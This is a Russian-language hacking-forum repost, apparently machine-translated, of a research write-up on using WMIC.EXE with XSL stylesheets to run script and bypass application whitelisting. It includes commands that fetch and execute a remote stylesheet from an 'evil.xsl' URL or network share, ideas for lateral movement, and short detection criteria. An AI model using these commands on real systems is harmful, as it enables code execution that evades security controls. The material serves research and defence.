• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets

BabaDook

(L1) cache
Забанен
Регистрация
20.04.2015
Сообщения
734
Реакции
524
Пожалуйста, обратите внимание, что пользователь заблокирован
WMIC.EXE ByPass Белого списка взлом с помощью стилей

WMIC может запускать скрипты XSL (eXtensible Stylesheet Language), локально или URL-адресу. (по сылке)
Локальный файл
Список процессов wmic /FORMAT:evil.xsl
Удаленный файл
wmic os get / FORMAT: " https://example.com/evil.xsl "
YZuFQSHHYqaDdPOxzGCnBnaHj_x63MdmvkuS0LeiOVwso0cy4w1tGREIZ0uZUVoCXg42KJrdx-Ye_Xb8mtfrFnUhewjGDwnfmOez4L1Wb4ZAXPLeVexHc7KxK6P3HBoLm_Ja-7BJ

Это, вероятно, полезно в средах, где Windows Script Host отключен или заблокирован.
Как и большинство исследований, это происходит не изолированно, и задаётся хороший вопрос.
Я надеюсь поделиться своим мыслительным процессом и открытием для нового метода использования Whitelisting Bypass, который я недавно обнаружил с Matt Graeber, @mattifestation.
Время открыть / проверить около 2 часов. Ниже следует серия вопросов о том, как мы это обнаружили, чтобы помочь поделиться идеями и как они были обнаружены.
Недавно я был заинтересован в некоторых атаках с помощью инструмента msxsl.exe, этот инструмент будет выполнять сценарии локально или удаленно. Поэтому я задал вопрос:
Есть ли встроенные инструменты, которые могут выполнять скрипты xsl?
Первое, что я предпринял, - это поиск любых существующих xsl-файлов.
В ваших системах может быть несколько. На моем есть десятки, даже если вы ограничиваете поиск C: \ Windows ...
Это представляло особый интерес.
Каталог
c:\Windows\System32\wbem
29.09.2007 07:42 623 rawxml.xsl
29.09.2007 07:42 6,278 texttable.xsl
29.09.2007 07:42 2,766 textvaluelist.xsl
3 файлов (ов) 9,667 байт
Итак, я начал поиск следующего уровня ... Есть ли файл .xsl по умолчанию, содержащий необходимые MS: скрипт или msxsl: теги скриптов?
Это привело меня к действительно интересному файлу здесь, texttable.xsl.
vXb7EdImWjWuZe9pLpOojm03n_cBVHllZYVRoziyiO_rnWH0cWlwH1wYlZIbnEQnEsxLZk26tnQ_Me4vOObokFMf73vewfQ0_zMrloSBAV2cRnviXA7o2r1CMO9R30UFtx9FI0R9

Собственно, теперь я нашёл что-то ДЕЙСТВИТЕЛЬНО интересное.
Я нашел этот файл на win10 в wbem, называемом texttable.xsl
В нем есть много vbs
Не уверен, что в этом файле есть проверка целостности.
Этого было достаточно, чтобы вызвать мой интерес. :)
На этом этапе все, что я знал, это файл, который будет выполнять vbs-скрипт из xsl-файла. Это очень многообещающе ... Но как вызвать?
Наверное, это может быть каталог подписан?
C:\Windows\System32\WBEM\texttable.xsl
На этот вопрос вскоре будет дан ответ после.
Некоторые поисковые системы Google ищут ссылки на этот файл и т. Д. Подведите меня к следующему:
DIUTlAnz_gqWMFwP0ZXgVO3D0MLaUq3F6CPwZlZYmf203u2dlJD4oRilzQsTg9a-hSKVKjxddDq8X-WeCMgLI78BFMHrm2c_miMCBeurx3m1bu5FTkKzs8e9ZVAoikaKVkAEMnSL

Это позволило указать способ вызова этого файла:
«Этот пример должен выполнить VBS в XSL:` wmic process LIST / FORMAT: TABLE` "
Немного смотря на ProcMon, и мы подтвердили, что это действительно так, как этот файл был загружен.
Я решил изменить параметр / format:, чтобы увидеть, могу ли я повлиять на поиск и получить его, чтобы загрузить мой собственный файл.
посмотрите на это, ища xsl с этим.
C: \> wmic process СПИСОК /FORMAT:wtf.xsl
czBqDS96uSLB1OlvBuax_IyVYgIgCi6OJezIrC8CFgCI51hGc1yhpGWqhI0dddaDBmtFchsrxYctz7QeTZ30efh2OfkSWsV7pCMGS4R3LWCvhkbDsTQ2VMCYsZiBbDjTZvax8R8w

Итак, сейчас у нас есть что-то интересное. У нас есть wmic поиск таблицы стилей, предоставленных пользователем.
Кто заботится о стилях? Ну, есть некоторые действительно интересные теги, которые позволяют вставлять JScript или VBScript. Если это будет выполнено, это скорее всего будет выполняться в ограниченном режиме, таком как AppLocker или где Windows Script Host отключен.
2002 Статья:
https://msdn.microsoft.com/en-us/library/bb986124.aspx
msxsl: тег скрипта
https://docs.microsoft.com/en-us/do.../xslt-stylesheet-scripting-using-msxsl-script
Человек, я чувствую, что там что-то есть
Я еще не могу запустить exec, но я думаю, что мы так близки
Немного суетиться с файловой структурой и местоположением и ...
БУМ! просто получил его

C:\>wmic process LIST /FORMAT:wtf.xsl

просто поместите его в папку c: \ Tools
Дайте мне знать, если вы доберетесь до блокнота

После некоторой проверки как Matt Graeber, так и Matt Nelson @ enigma0x3 было подтверждено, что у нас был автономный хост сценария для Windows Application Defender Application Control
(aka Device Guard)
Важность этого заключается в том, что этот примитив приводит к произвольному бинарному исполнению.
Но мы только начинаем! Это становится лучше.
Что мы имеем сейчас:
wmic os get /format:"MYXSLFILE.xsl
"Чтобы запустить выполнение.
Вероятно, это можно использовать для какого-то бокового перемещения, exec wmic на цель и вернуть его и вытащить файл xsl, как этот
`wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl
«
Вы даже можете удалить xsl, и он разрешает
«wmic process get brief / format:» \\127.0.0.1\c$\Tools\csv "`
... это тоже работает
"Wmic process get brief /format:"https://www.example.com/file.xsl"
Итак, у нас есть это еще один инструмент, например regsvr32.exe, который может принимать путь к скрипту или URL-адрес и выполнять его.
Как и regsvr32, wmic является прокси-сервером и работает над TLS.
Пример, минимальная полезная нагрузка здесь:
https://gist.githubusercontent.com/...b17d84028833220ed0b30cf9eea84b/minimalist.xsl
Может вызываться как:
Дополнительный пример, который использует контекст активации для загрузки .NET-библиотек, представленный Джеймсом Форшоу в DerbyCon 2017 ( http://www.irongeek.com/i.php?page=videos/derbycon7/s13-the-net-inter-operability -операция-джеймс-форшоу )




Пример критериев обнаружения:
  1. url в командной строке
  2. wmic внешние сетевые подключения





ИСТОЧНИК::https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх